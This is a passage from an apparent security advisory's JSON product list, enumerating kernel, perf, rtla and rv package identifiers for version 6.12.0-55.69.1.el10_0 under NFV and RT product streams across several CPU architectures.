"NFV-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:kernel-tools-libs-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:kernel-uki-virt-addons-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:kernel-zfcpdump-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:kernel-zfcpdump-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:libperf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:python3-perf-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rtla-0:6.12.0-55.69.1.el10_0.x86_64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.aarch64",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.ppc64le",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.s390x",
"NFV-10.0.Z.E2S:rv-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.src",
"RT-10.0.Z.E2S:kernel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-abi-stablelists-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debug-uki-virt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-aarch64-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-debuginfo-common-ppc64le-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-debuginfo-common-s390x-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-debuginfo-common-x86_64-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-devel-matched-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-doc-0:6.12.0-55.69.1.el10_0.noarch",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-64k-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-64k-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debug-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-devel-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-kvm-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-core-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-rt-modules-extra-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.s390x",
"RT-10.0.Z.E2S:kernel-tools-debuginfo-0:6.12.0-55.69.1.el10_0.x86_64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.aarch64",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.ppc64le",
"RT-10.0.Z.E2S:kernel-tools-libs-0:6.12.0-55.69.1.el10_0.x86_64",
